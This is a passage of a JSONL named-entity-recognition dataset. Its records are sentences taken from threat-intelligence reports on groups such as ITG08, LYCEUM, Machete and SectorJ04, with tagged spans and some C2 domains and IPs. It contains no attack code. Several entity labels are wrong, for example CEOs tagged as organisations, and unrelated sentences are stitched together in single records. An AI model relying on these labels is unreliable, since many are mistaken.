3742], [3840, 3850], [7978, 7988]], "ORGANIZATION: organisations": [[3762, 3775]], "ORGANIZATION: government agencies": [[4074, 4093]], "ORGANIZATION: 360-CERT": [[4151, 4159]], "ORGANIZATION: Anomali": [[4546, 4553]], "TOOL: email": [[4669, 4674]], "ORGANIZATION: 360 Threat Intelligence Center": [[4769, 4799]], "MALWARE: China Chopper": [[4936, 4949], [5336, 5349], [5481, 5494]], "THREAT_ACTOR: Leviathan": [[5018, 5027]], "THREAT_ACTOR: Threat Group-3390": [[5032, 5049]], "FILEPATH: China Chopper": [[5127, 5140], [5685, 5698], [7014, 7027]], "ORGANIZATION: Cisco Talos": [[5301, 5312]], "ORGANIZATION: government organization": [[5583, 5606]], "TOOL: Virtual Terminal": [[5725, 5741]], "FILEPATH: Mimikatz Lite": [[5946, 5959]], "FILEPATH: GetPassword.exe": [[5963, 5978]], "FILEPATH: tool": [[5985, 5989]], "THREAT_ACTOR: actor": [[6120, 6125]], "VULNERABILITY: CVE-2018–8440": [[6146, 6159]], "VULNERABILITY: vulnerability": [[6188, 6201], [8817, 8830]], "SYSTEM: Windows": [[6205, 6212], [6522, 6529], [7132, 7139]], "VULNERABILITY: proof-of-concept": [[6324, 6340]], "THREAT_ACTOR: Cloud Atlas": [[6544, 6555], [6910, 6921], [7279, 7290], [7497, 7508], [7552, 7563], [7653, 7664]], "ORGANIZATION: Palo Alto": [[6952, 6961]], "VULNERABILITY: CVE-2015-0062": [[7156, 7169]], "VULNERABILITY: CVE-2015-1701": [[7172, 7185]], "VULNERABILITY: CVE-2016-0099": [[7190, 7203]], "ORGANIZATION: Microsoft": [[7373, 7382], [20894, 20903]], "VULNERABILITY: CVE-2017-11882": [[7406, 7420]], "VULNERABILITY: CVE-2018-0802": [[7432, 7445]], "THREAT_ACTOR: Gamaredon Group": [[7893, 7908], [8135, 8150], [8416, 8431], [8434, 8449]], "ORGANIZATION: military": [[7993, 8001], [14779, 14787], [16879, 16887], [17393, 17401], [17837, 17845], [18019, 18027], [18537, 18545]], "ORGANIZATION: Presidential Administration": [[8342, 8369]], "ORGANIZATION: organizations": [[8477, 8490], [14788, 14801], [18841, 18854]], "MALWARE: documents": [[8569, 8578]], "THREAT_ACTOR: they": [[8594, 8598]], "MALWARE: (RMS)": 
[[8674, 8679]], "FILEPATH: archive": [[8749, 8756]], "THREAT_ACTOR: ITG08": [[8992, 8997], [9037, 9042], [9334, 9339], [9442, 9447], [9672, 9677], [9846, 9851], [10556, 10561], [10928, 10933], [11084, 11089], [11349, 11354], [11504, 11509], [11977, 11982]], "THREAT_ACTOR: FIN6": [[9014, 9018]], "ORGANIZATION: e-commerce environments": [[9071, 9094]], "ORGANIZATION: retailers": [[9579, 9588]], "ORGANIZATION: hospitality sector": [[9610, 9628]], "MALWARE: More_eggs backdoor": [[9688, 9706], [11992, 12010]], "THREAT_ACTOR: Attackers": [[9745, 9754], [17954, 17963]], "MALWARE: Comodo code-signing certificates": [[9857, 9889]], "THREAT_ACTOR: ITG08’s": [[9968, 9975], [11777, 11784], [12172, 12179]], "FILEPATH: More_eggs backdoor": [[10131, 10149], [10327, 10345]], "FILEPATH: More_eggs malware": [[10183, 10200]], "FILEPATH: cmd.exe": [[10284, 10291]], "ORGANIZATION: X-Force IRIS": [[10294, 10306]], "TOOL: Dynamic Link Library": [[10438, 10458]], "TOOL: DLL": [[10461, 10464]], "MALWARE: WMI": [[10616, 10619]], "MALWARE: PowerShell": [[10624, 10634], [12187, 12197]], "MALWARE: More_eggs": [[10908, 10917], [11478, 11487]], "MALWARE: Mimikatz": [[11005, 11013]], "MALWARE: More_eggs JScript backdoor": [[11113, 11139], [11377, 11403]], "FILEPATH: Mimikatz": [[11142, 11150]], "MALWARE: offensive security tools": [[11537, 11561]], "MALWARE: PowerShell scripts": [[11566, 11584]], "ORGANIZATION: IBM X-Force IRIS": [[11736, 11752]], "MALWARE: tools": [[11867, 11872]], "TOOL: PowerShell": [[12088, 12098]], "THREAT_ACTOR: LYCEUM": [[12234, 12240], [12406, 12412], [12968, 12974], [13096, 13102], [13470, 13476], [13575, 13581], [13924, 13930], [14054, 14060], [14155, 14161]], "ORGANIZATION: strategic national importance": [[12290, 12319]], "ORGANIZATION: oil and gas": [[12332, 12343]], "ORGANIZATION: telecommunications": [[12357, 12375]], "ORGANIZATION: CTU": [[12378, 12381], [12918, 12921], [13349, 13352], [13998, 14001], [14401, 14404]], "THREAT_ACTOR: COBALT GYPSY": [[12799, 
12811]], "THREAT_ACTOR: OilRig": [[12833, 12839]], "THREAT_ACTOR: Crambus": [[12842, 12849]], "THREAT_ACTOR: APT34": [[12856, 12861]], "THREAT_ACTOR: COBALT TRINITY": [[12866, 12880]], "THREAT_ACTOR: Elfin": [[12895, 12900]], "THREAT_ACTOR: APT33": [[12905, 12910]], "MALWARE: post-intrusion tools": [[13221, 13241]], "FILEPATH: DanBot": [[13322, 13328]], "MALWARE: Get-LAPSP.ps1": [[13367, 13380]], "MALWARE: PowerShell script": [[13386, 13403]], "MALWARE: DanBot": [[13500, 13506]], "MALWARE: maldocs": [[13602, 13609]], "THREAT_ACTOR: LYCEUM’s": [[13770, 13778], [14357, 14365]], "ORGANIZATION: executives": [[13792, 13802]], "ORGANIZATION: HR staff": [[13805, 13813]], "ORGANIZATION: IT personnel": [[13820, 13832]], "MALWARE: maldoc": [[13875, 13881]], "ORGANIZATION: ICS": [[13906, 13909]], "ORGANIZATION: OT staff": [[13913, 13921]], "ORGANIZATION: energy organizations": [[14187, 14207]], "THREAT_ACTOR: groups": [[14649, 14655]], "THREAT_ACTOR: Machete": [[14804, 14811], [14999, 15006], [15210, 15217], [15377, 15384], [15483, 15490], [15595, 15602], [15823, 15830], [16382, 16389], [16921, 16928], [17049, 17056], [17182, 17189], [17311, 17318], [17411, 17418], [17533, 17540], [17635, 17642], [17731, 17738], [18111, 18118], [18592, 18599], [18602, 18609]], "MALWARE: malware": [[14904, 14911]], "ORGANIZATION: ESET": [[14959, 14963], [15992, 15996], [16771, 16775], [17252, 17256], [18357, 18361]], "TOOL: Python-based": [[15020, 15032]], "ORGANIZATION: Ecuadorean military": [[15138, 15157]], "THREAT_ACTOR: Their": [[15228, 15233]], "ORGANIZATION: describe navigation routes": [[15413, 15439]], "FILEPATH: Previous versions": [[15723, 15740]], "THREAT_ACTOR: Cylance": [[15781, 15788]], "FILEPATH: GoogleUpdate.exe": [[15903, 15919]], "TOOL: C&C": [[15979, 15982], [18453, 18456]], "FILEPATH: malware": [[16113, 16120]], "THREAT_ACTOR: Machete's": [[16618, 16627]], "ORGANIZATION: Cylance": [[17027, 17034]], "THREAT_ACTOR: They": [[17791, 17795]], "THREAT_ACTOR: OceanLotus": 
[[19013, 19023]], "FILEPATH: They": [[19250, 19254]], "THREAT_ACTOR: HackingTeam": [[19458, 19469]], "ORGANIZATION: report": [[19720, 19726]], "THREAT_ACTOR: SectorJ04": [[19788, 19797], [19924, 19933], [19966, 19975], [20201, 20210], [20672, 20681], [20763, 20772], [21024, 21033], [21344, 21353]], "ORGANIZATION: industrial sectors": [[20031, 20049]], "THREAT_ACTOR: SectorJ04's": [[20437, 20448]], "THREAT_ACTOR: attacker’s": [[20645, 20655]], "TOOL: Word": [[20826, 20830]], "FILEPATH: document files": [[20865, 20879]], "ORGANIZATION: financial institutions": [[21067, 21089]], "ORGANIZATION: medical": [[21267, 21274]], "ORGANIZATION: pharmaceutical": [[21277, 21291]], "ORGANIZATION: media": [[21294, 21299]], "ORGANIZATION: energy": [[21302, 21308]], "ORGANIZATION: manufacturing": [[21313, 21326]], "MALWARE: ServHelper": [[21393, 21403]], "MALWARE: FlawedAmmy RAT": [[21408, 21422]]}, "info": {"id": "cyberner_stix_train_007910", "source": "cyberner_stix_train"}} {"text": "They quickly move away from their initial access vector to hide their entry point and then target Exchange servers as a new access vector .", "spans": {}, "info": {"id": "cyberner_stix_train_007911", "source": "cyberner_stix_train"}} {"text": "This version includes 185 different applications , including official applications of worldwide banks . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . 
The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": {"VULNERABILITY: CVE-2017-0143": [[104, 117]], "MALWARE: tools—EternalRomance": [[153, 173]], "MALWARE: EternalSynergy—that": [[178, 197]], "MALWARE: custom dropper": [[316, 330]], "FILEPATH: MagicHound.DropIt": [[358, 375]]}, "info": {"id": "cyberner_stix_train_007912", "source": "cyberner_stix_train"}} {"text": "Additionally , open sources have reported for several years that in Russia and China , high-profile hotel guests may expect their hotel rooms to be accessed and their laptops and other electronic devices accessed .", "spans": {}, "info": {"id": "cyberner_stix_train_007913", "source": "cyberner_stix_train"}} {"text": "Across two campaigns of several million messages each , the actor used both macro laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs .", "spans": {"TOOL: macro": [[76, 81]], "ORGANIZATION: Microsoft": [[88, 97]], "TOOL: Word": [[98, 102]], "TOOL: zipped": [[117, 123]], "TOOL: VBScript": [[124, 132]], "MALWARE: Trojan": [[160, 166]], "TOOL: PCs": [[187, 190]]}, "info": {"id": "cyberner_stix_train_007914", "source": "cyberner_stix_train"}} {"text": "PackageInstaller shows the app ’ s permission access and asks for the user 's approval , which then installs the application . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . 
360 and Tuisec already identified some Gorgon Group members .", "spans": {"THREAT_ACTOR: APT33": [[342, 347]], "ORGANIZATION: FireEye": [[385, 392]], "ORGANIZATION: 360": [[405, 408]], "ORGANIZATION: Tuisec": [[413, 419]], "THREAT_ACTOR: Gorgon Group": [[444, 456]], "ORGANIZATION: members": [[457, 464]]}, "info": {"id": "cyberner_stix_train_007915", "source": "cyberner_stix_train"}} {"text": "After reversing these opcodes , we were able to update our interpreter script to support both 32-bit and 64-bit virtual machines used by FinFisher . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The size of the payload is encoded within the first four pixels of the image . TLDR OilRig is leveraging a new backdoor dubbed Marlin as part of a longrunning espionage campaign that started in April 2018 .", "spans": {"MALWARE: FinFisher": [[137, 146]], "TOOL: HTML application": [[219, 235]], "MALWARE: HTA": [[238, 241]], "THREAT_ACTOR: OilRig": [[336, 342]], "MALWARE: Marlin": [[379, 385]]}, "info": {"id": "cyberner_stix_train_007916", "source": "cyberner_stix_train"}} {"text": "We also found the init0 script running ; the script cleans out all miners regardless of its origin .", "spans": {}, "info": {"id": "cyberner_stix_train_007917", "source": "cyberner_stix_train"}} {"text": "Check Point Research reported these dangerous apps to Google upon discovery . Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan . We named the first group RevengeHotels , and the second ProCC . 
Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "ORGANIZATION: Google": [[54, 60]], "TOOL: Corkow Trojan": [[165, 178]], "THREAT_ACTOR: RevengeHotels": [[206, 219]], "THREAT_ACTOR: ProCC": [[237, 242]], "THREAT_ACTOR: Chinese state - sponsored actors": [[245, 277]], "ORGANIZATION: U.S.-based organizations": [[334, 358]], "ORGANIZATION: federal government agencies": [[363, 390]], "ORGANIZATION: State Department": [[407, 423]]}, "info": {"id": "cyberner_stix_train_007918", "source": "cyberner_stix_train"}} {"text": "This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . some indications of loosely linked activity dating back to at least 2013 .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: group": [[51, 56]], "THREAT_ACTOR: hackers": [[74, 81]], "THREAT_ACTOR: admin@338": [[89, 98]], "THREAT_ACTOR: attackers": [[158, 167]], "ORGANIZATION: government officials": [[177, 197]], "THREAT_ACTOR: cyber espionage": [[233, 248]]}, "info": {"id": "cyberner_stix_train_007919", "source": "cyberner_stix_train"}} {"text": "Another trick in “ Agent Smith ’ s arsenal is to change the settings of the update timeout , making the original application wait endlessly for the update check . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology . The now-malicious processes are released from suspension and run . 
We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"MALWARE: Agent Smith": [[19, 30]], "THREAT_ACTOR: Anchor Panda": [[213, 225]], "ORGANIZATION: naval": [[349, 354]], "ORGANIZATION: aerospace technology": [[359, 379]]}, "info": {"id": "cyberner_stix_train_007920", "source": "cyberner_stix_train"}} {"text": "Inside the SDK The malware resides within the ‘ RXDrioder ’ Software Development Kit ( SDK ) , which is provided by ‘ addroider [ . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India .", "spans": {"THREAT_ACTOR: APT38": [[152, 157]], "ORGANIZATION: banking": [[274, 281]], "ORGANIZATION: government organizations": [[318, 342]], "ORGANIZATION: information technology services": [[356, 387]], "ORGANIZATION: government": [[397, 407]]}, "info": {"id": "cyberner_stix_train_007921", "source": "cyberner_stix_train"}} {"text": "Filename : ntslwin.exe MD5 : f4cab3a393462a57639faa978a75d10a .", "spans": {"FILEPATH: ntslwin.exe": [[11, 22]], "FILEPATH: f4cab3a393462a57639faa978a75d10a": [[29, 61]]}, "info": {"id": "cyberner_stix_train_007922", "source": "cyberner_stix_train"}} {"text": "The WIZARD SPIDER threat group is the Russia-based operator of the TrickBot banking malware . 
Silence also used Russian-language web hosting services .", "spans": {"THREAT_ACTOR: WIZARD SPIDER": [[4, 17]], "TOOL: TrickBot banking malware": [[67, 91]], "MALWARE: web hosting services": [[129, 149]]}, "info": {"id": "cyberner_stix_train_007923", "source": "cyberner_stix_train"}} {"text": "However , although the “ Concipit1248 ” app requested permissions to open the device camera and read photos , the code only can upload a self-contained PNG file to a remote sever . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . in addition to normal operations mentioned in the original cases . It is attributed to Iranian statesponsored APT Charming Kitten , whose other recent attacks include targeting world leaders attending the Munich Security Conference and the T20 Summit in Saudi Arabia in an effort to steal their email credentials , targeting Israeli scholars and U.S. government employees in another credentialstealing effort last July , and also attacking the reelection effort of former President Donald Trump .", "spans": {"THREAT_ACTOR: GCMAN group": [[228, 239]], "ORGANIZATION: bank": [[272, 276]], "THREAT_ACTOR: Iranian statesponsored APT Charming Kitten": [[440, 482]], "ORGANIZATION: world leaders attending the Munich Security Conference and the T20 Summit": [[530, 603]], "ORGANIZATION: Israeli scholars": [[678, 694]], "ORGANIZATION: U.S. government employees": [[699, 724]]}, "info": {"id": "cyberner_stix_train_007924", "source": "cyberner_stix_train"}} {"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone . 
The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 . We will describe APT1 ’s backdoors in two categories : “ Beachhead Backdoors ” and “ Standard Backdoors. ” The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": {"MALWARE: Android.Oldboot": [[4, 19]], "SYSTEM: android": [[118, 125]], "THREAT_ACTOR: Goldmouse": [[379, 388]], "THREAT_ACTOR: APT1": [[432, 436]], "MALWARE: malware": [[552, 559]], "MALWARE: massively multiplayer online role - playing games": [[589, 638]]}, "info": {"id": "cyberner_stix_train_007925", "source": "cyberner_stix_train"}} {"text": "Conclusions This Trojan was distributed through the Google Play Store and uses a number of very dangerous techniques , including patching system libraries . We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 . From our observations , it is one of the most prolific cyber espionage groups in terms of the sheer quantity of information stolen . 
The attackers left a small clue in the code , in the form of the number 666 ( 0x29A hex ) before one of the decryption subroutines : • By analysing the logs from the command servers , we have observed 59 unique victims in 23 countries : For the detailed analysis and information on how to protect against the attack , please read :", "spans": {"SYSTEM: Google Play Store": [[52, 69]], "ORGANIZATION: Kaspersky": [[208, 217]], "TOOL: Octopus": [[286, 293]], "THREAT_ACTOR: attackers": [[495, 504]], "SYSTEM: the command servers": [[653, 672]]}, "info": {"id": "cyberner_stix_train_007926", "source": "cyberner_stix_train"}} {"text": "They appear to have been active since 2006 .", "spans": {}, "info": {"id": "cyberner_stix_train_007927", "source": "cyberner_stix_train"}} {"text": "Symantec has also been able to connect earlier attack campaigns with Sowbug , demonstrating that it has been active since at least early-2015 and may have been operating even earlier . LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Sowbug": [[69, 75]], "THREAT_ACTOR: Barium": [[194, 200]], "ORGANIZATION: SOC personnel": [[271, 284]]}, "info": {"id": "cyberner_stix_train_007928", "source": "cyberner_stix_train"}} {"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . 
\" Machete \" is a targeted attack campaign with Spanish speaking roots .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: Lazarus": [[50, 57]], "ORGANIZATION: mobile gaming": [[77, 90]]}, "info": {"id": "cyberner_stix_train_007929", "source": "cyberner_stix_train"}} {"text": "Defense against FinFisher Exposing as much of FinFisher ’ s riddles as possible during this painstaking analysis has allowed us to ensure our customers are protected against this advanced piece of malware . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy . OceanLotus : {9E3BD021-B5AD-49DEAE93-F178329EE0FE} C&C URLs varies content is read from resource P1/2 . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": {"MALWARE: FinFisher": [[16, 25], [46, 55]], "THREAT_ACTOR: OceanLotus": [[352, 362]], "THREAT_ACTOR: 8BASE": [[503, 508]], "ORGANIZATION: Brazil": [[537, 543]], "THREAT_ACTOR: PLAY": [[579, 583]], "ORGANIZATION: Switzerland": [[595, 606]]}, "info": {"id": "cyberner_stix_train_007930", "source": "cyberner_stix_train"}} {"text": "APT28 used this technique to steal usernames and hashed passwords that allowed escalation of privileges in the victim network .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_007931", "source": "cyberner_stix_train"}} {"text": "] today somtum [ . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang . The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe . 
Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server ’s Unified Messaging Service .", "spans": {"ORGANIZATION: Fox-IT": [[86, 92]], "THREAT_ACTOR: Mofang": [[143, 149]], "FILEPATH: Backdoor.APT.Aumlib": [[197, 216]], "FILEPATH: Backdoor.APT.Ixeshe": [[221, 240]], "SYSTEM: Exchange Server ’s Unified Messaging Service": [[350, 394]]}, "info": {"id": "cyberner_stix_train_007932", "source": "cyberner_stix_train"}} {"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": {"ORGANIZATION: FireEye": [[6, 13], [142, 149]], "ORGANIZATION: BACKSWING": [[40, 49], [73, 82]], "MALWARE: BADRABBIT": [[61, 70]], "MALWARE: BADRABBIT dropper": [[198, 215]], "MALWARE: PIVY": [[288, 292]], "FILEPATH: malicious files": [[516, 531]]}, "info": {"id": "cyberner_stix_train_007933", "source": "cyberner_stix_train"}} {"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . 
When G-Data published on Turla/Uroburos back in February , several questions remained unanswered .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day vulnerability": [[65, 87]], "ORGANIZATION: G-Data": [[252, 258]], "THREAT_ACTOR: Turla/Uroburos": [[272, 286]]}, "info": {"id": "cyberner_stix_train_007934", "source": "cyberner_stix_train"}} {"text": "Use caution and exercise due diligence when faced with a shortened link , especially in unsolicited email messages .", "spans": {"TOOL: email": [[100, 105]]}, "info": {"id": "cyberner_stix_train_007935", "source": "cyberner_stix_train"}} {"text": "] today svcws [ . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"VULNERABILITY: CVE-2012-0158": [[70, 83]], "ORGANIZATION: Malwarebytes EDR and MDR": [[220, 244]]}, "info": {"id": "cyberner_stix_train_007936", "source": "cyberner_stix_train"}} {"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"THREAT_ACTOR: XENOTIME": [[166, 174]], "ORGANIZATION: Dragos WorldView": [[282, 298]]}, "info": {"id": "cyberner_stix_train_007937", "source": "cyberner_stix_train"}} {"text": "The client deserializes the packet into IPacket GetSystemInfo .", "spans": {}, "info": {"id": "cyberner_stix_train_007938", "source": "cyberner_stix_train"}} {"text": "Some common techniques include : basic XOR encryption , nested XOR and custom key-derivation methods . 
APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications . RunAs Create new process as another User or Process context . In a modern ransomware attack the target is an entire organisation , not just one or two computers .", "spans": {"THREAT_ACTOR: APT5": [[103, 107]], "ORGANIZATION: telecommunications": [[207, 225]], "ORGANIZATION: technology companies": [[230, 250]], "ORGANIZATION: satellite communications": [[282, 306]], "ORGANIZATION: entire organisation , not just one or two computers": [[418, 469]]}, "info": {"id": "cyberner_stix_train_007939", "source": "cyberner_stix_train"}} {"text": "Technical Analysis Permissions Marcher ’ s APK size is fairly small ( only 683KB for sample eb8f02fc30ec49e4af1560e54b53d1a7 ) , much smaller than most legitimate apps and other popular mobile malware samples . The first sample being captured was in April 2018 and since that we observed a lot more related ones . ZxShell is a sophisticated tool employed by Group 72 that contains all kinds of functionality . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n’t granular enough .", "spans": {"MALWARE: Marcher": [[31, 38]], "MALWARE: ZxShell": [[314, 321]], "THREAT_ACTOR: Group 72": [[358, 366]], "SYSTEM: Google Analytics platform": [[417, 442]], "ORGANIZATION: CSP": [[595, 598]]}, "info": {"id": "cyberner_stix_train_007940", "source": "cyberner_stix_train"}} {"text": "EventBot Sending the pin code back to the C2 Sending the pin code back to the C2 . While investigating KerrDown we found multiple RAR files containing a variant of the malware . 
The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: KerrDown": [[103, 111]], "ORGANIZATION: we": [[112, 114]]}, "info": {"id": "cyberner_stix_train_007941", "source": "cyberner_stix_train"}} {"text": "Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities . Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek — the CEOs of Facebook , Twitter , Google and Spotify , respectively — have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "THREAT_ACTOR: APT28": [[10, 15]], "ORGANIZATION: military": [[114, 122]], "ORGANIZATION: Mark Zuckerberg": [[134, 149]], "ORGANIZATION: Jack Dorsey": [[152, 163]], "ORGANIZATION: Sundar Pichai": [[166, 179]], "ORGANIZATION: Daniel Ek": [[186, 195]], "ORGANIZATION: CEOs": [[202, 206]], "ORGANIZATION: Facebook": [[210, 218]], "ORGANIZATION: Twitter": [[221, 228]], "ORGANIZATION: Google": [[231, 237]], "ORGANIZATION: technology": [[360, 370]]}, "info": {"id": "cyberner_stix_train_007942", "source": "cyberner_stix_train"}} {"text": "The organization was closed after the CSIS presentation . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks . The emails normally come from compromised personal accounts or are entirely spoofed . 
This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": {"ORGANIZATION: CSIS": [[38, 42]], "ORGANIZATION: IT": [[148, 150]], "ORGANIZATION: financial institutions": [[189, 211]], "TOOL: emails": [[281, 287]], "MALWARE: NetSupport RAT": [[598, 612]]}, "info": {"id": "cyberner_stix_train_007943", "source": "cyberner_stix_train"}} {"text": "For example , the summer 2015 attack that used the unusual ' resume ' would not have been successful on Windows 10 as-is because of the presence of the Supervisor Mode Execution Prevention ( SMEP ) mitigation , even without the latest security updates installed . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection .", "spans": {}, "info": {"id": "cyberner_stix_train_007944", "source": "cyberner_stix_train"}} {"text": "[ Note : The analysis of the functionality below describes a single app , but applies to all apps of the Android/AdDisplay.Ashas family . Kaspersky wrote about LuckyMouse targeting national data centers in June . The handling of instructions has improved too .", "spans": {"MALWARE: Android/AdDisplay.Ashas family": [[105, 135]], "ORGANIZATION: Kaspersky": [[138, 147]], "ORGANIZATION: LuckyMouse": [[160, 170]]}, "info": {"id": "cyberner_stix_train_007945", "source": "cyberner_stix_train"}} {"text": "The loader used by the sample purported to have been compiled on the 25th of March 2010 .", "spans": {}, "info": {"id": "cyberner_stix_train_007946", "source": "cyberner_stix_train"}} {"text": "To their credit , both Google and Amazon appear to have put pressure on device manufacturers to fix their devices when flaws are found , Strazzere says . 
As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . C2 : krjregh.sacreeflame.com .", "spans": {"ORGANIZATION: Google": [[23, 29]], "ORGANIZATION: Amazon": [[34, 40]], "VULNERABILITY: CVE-2017-11882": [[182, 196]], "VULNERABILITY: CVE-2018-0802": [[201, 214]], "TOOL: weaponizer": [[221, 231]], "THREAT_ACTOR: actors": [[280, 286]], "TOOL: C2": [[436, 438]], "DOMAIN: krjregh.sacreeflame.com": [[441, 464]]}, "info": {"id": "cyberner_stix_train_007947", "source": "cyberner_stix_train"}} {"text": "HummingBad sends notifications to Umeng , a tracking and analytics service attackers use to manage their campaign . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . APT33 : 64.251.19.217 [REDACTED].servehttp.com . 
Cuba ransomware was first observed in 2019 .", "spans": {"MALWARE: HummingBad": [[0, 10]], "THREAT_ACTOR: Lazarus": [[130, 137]], "ORGANIZATION: enterprises": [[232, 243]], "THREAT_ACTOR: attackers": [[255, 264]], "THREAT_ACTOR: APT33": [[332, 337]], "DOMAIN: 64.251.19.217": [[340, 353]], "DOMAIN: [REDACTED].servehttp.com": [[354, 378]], "MALWARE: Cuba ransomware": [[381, 396]]}, "info": {"id": "cyberner_stix_train_007948", "source": "cyberner_stix_train"}} {"text": "The report also includes a mention of the same IP address used as Command & Control server in the attack against Bundestag ( 176.31.112.10 ) .", "spans": {"TOOL: Command & Control": [[66, 83]], "ORGANIZATION: Bundestag": [[113, 122]], "IP_ADDRESS: 176.31.112.10": [[125, 138]]}, "info": {"id": "cyberner_stix_train_007949", "source": "cyberner_stix_train"}} {"text": "The 2016 presidential election has the world ’s attention , and leaders of other states are anxiously watching and planning for possible outcomes .", "spans": {}, "info": {"id": "cyberner_stix_train_007950", "source": "cyberner_stix_train"}} {"text": "We named this campaign “ Bouncing Golf ” based on the malware ’ s code in the package named “ golf. ” June 18 , 2019 We uncovered a cyberespionage campaign targeting Middle Eastern countries . Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims . The operating system also creates a registry key within the software registry hive that is specifically associated with the creation of the scheduled task on the destination host : Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1 . 
Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": {"MALWARE: Bouncing Golf": [[25, 38]], "THREAT_ACTOR: Samurai Panda": [[193, 206]], "SYSTEM: Microsoft\\Windows": [[545, 562]], "ORGANIZATION: Researchers": [[611, 622]], "ORGANIZATION: online video game companies": [[696, 723]]}, "info": {"id": "cyberner_stix_train_007951", "source": "cyberner_stix_train"}} {"text": "Extremely high-volume campaigns distributing Locky exclusively in July 2016 , consistently delivering tens of millions of messages .", "spans": {"MALWARE: Locky": [[45, 50]]}, "info": {"id": "cyberner_stix_train_007952", "source": "cyberner_stix_train"}} {"text": "The attacker can choose the data types to collect , which are written in a certain format . ScarCruft uses a multi-stage binary infection scheme . The malware is designed for receiving modules to be executed in-memory and sending the results to C2s . Recently , this model for threat actors has come to be known as the “ as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": {"THREAT_ACTOR: 